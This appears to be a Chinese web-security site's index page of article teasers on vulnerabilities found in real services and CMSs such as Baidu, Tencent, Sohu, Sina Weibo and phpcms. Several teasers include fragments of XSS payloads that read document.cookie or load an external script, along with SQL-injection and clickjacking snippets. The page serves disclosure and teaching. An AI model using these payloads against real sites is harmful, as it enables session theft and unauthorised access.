欢迎来到[自学php网] ①群 287460651

百度相册存储型XSS漏洞指谁打谁，可对用户留置关注热度:26

1 插入不要闭合的代码：script src=http: q601333824 duapp com 3 js2 代码存在的位置3 评论变成了null,但是百度首页有提醒，个人中心也能弹出来修复方案：过滤..[详情]

siteserver最新版3.6.4 sql inject 第十蛋 - 网站安全关注热度:36

第11个注入存在 siteserver cms console_logSite aspx用 NET Reflector 反编译SiteServer CMS dll这个文件查看代码如下：public void Page_Load(object sender, EventArgs E){ int num; E..[详情]

360shop官网post注入一枚 - 网站安全 - 自学php关注热度:33

漏洞网站：http: www 360shop com cnpost信息：POST register php HTTP 1 1Content-Length: 254Content-Type: application x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http: www..[详情]

phpcms2008会员中心某处xss - 网站安全 - 自学php关注热度:22

再会员中心随处修改资料，写入xss代码。诱发管理后台点击? 1 2 3..[详情]

上传漏洞科普[1]-文件上传表单是Web安全主要威胁关注热度:20

为了让最终用户将文件上传到您的网站，就像是给危及您的服务器的恶意用户打开了另一扇门。即便如此，在今天的现代互联网的Web应用程序，它是一种 常见的要求，因为它有助于提高..[详情]

上传漏洞科普[2]-js验证 - 网站安全 - 自学php关注热度:20

关于文件上传漏洞，想必玩web安全的同学们都有接触，之前本站也发布过一篇文章介绍文件上传漏洞的各种绕过方法，但是只是有文档却没有演示代码， 最近给公司一客户培训，就照文..[详情]

mXSS攻击的成因及常见种类 - 网站安全 - 自学php关注热度:19

0x00 译者的话本文原文是由国外大牛Mario Heiderich在2013年所写的一篇paper：mXSS attacks: attacking well-secured web-applications by using innerHTML mutations 本人觉得此类mXSS攻击较为隐蔽..[详情]

手动web应用程序渗透测试-模糊测试中的后缀与前关注热度:16

介绍本文重点讲述采用模糊测试的方法测试目标Web应用程序时，可利用的前缀和后缀语法。句法后缀语法-字母字符+特殊字符（Suffix Syntax ndash; AlphabeticsSpecialcharacters）指字母字符后加特..[详情]

新浪微博点击劫持刷粉丝 - 网站安全 - 自学php关注热度:21

微博主站检测了是否被iframe，不过手机站没有检测。参考测试代码参考：htmlheadtitleclickjacking titlescript function showHide_frame() { var text_1 = docume..[详情]

清竹虚拟主机管理系统sql注入 + 后台构造cookie登关注热度:27

清竹虚拟主机管理系统sql注入漏洞NCompany Index asploadfile_fromcache templatePathNCompany-Index html 39;加载index html模板TempCon=TempConApplication(Qz_TP_templatePathNComp..[详情]

phpcms v9 SQL注入漏洞（第二弹） - 网站安全 - 自学关注热度:24

漏洞文件发生在phpcms modules member index php中392行public function account_manage_info() { account_manage_info方法，就是更新个人资料if(isset($_POST[ 39;dosubmit 39;])) { 更新用户昵称$..[详情]

腾讯视频主站分享至微信xss一枚，可cookie哦！关注热度:44

http: v qq com share weixin html?url=javascript：alert(document cookie)title=分享至微信分享至微信url过滤不严 导致xsshttp: v qq com share weixin html?url=javascript：alert(document cookie)titl..[详情]

搜狐家居论坛有一个通杀所有子论坛的xss - 网站关注热度:28

随便找一个论坛链接http: home focus cn msgview 1632 270131257 html在个人签名处输入：pimg height=0 onerror=alert( 亲，这里有个xss漏洞你们知道吗 );alert(document cookie) src= width=0..[详情]

TCCMS某处设计缺陷，成功打入官网后台 - 网站安全关注热度:22

问题发生在app controller user class php146行public function update() {$_Obj = M ( 39;user 39; );if (($_POST [ 39;info 39;] [ 39;password 39;] !== $_POST [ 39;password1 39;])..[详情]

Flash XSS 漏洞详解 根治的好办法 - 网站安全 - 自学关注热度:39

本文的目的是深层次的分析Flash的ExternalInterface的XSS漏洞，并提出比较有效的解决方案。首先，我们看看什么情况下，会出现XSS。第一种情况：把flashvars传入的参数（或者其他能被别人控..[详情]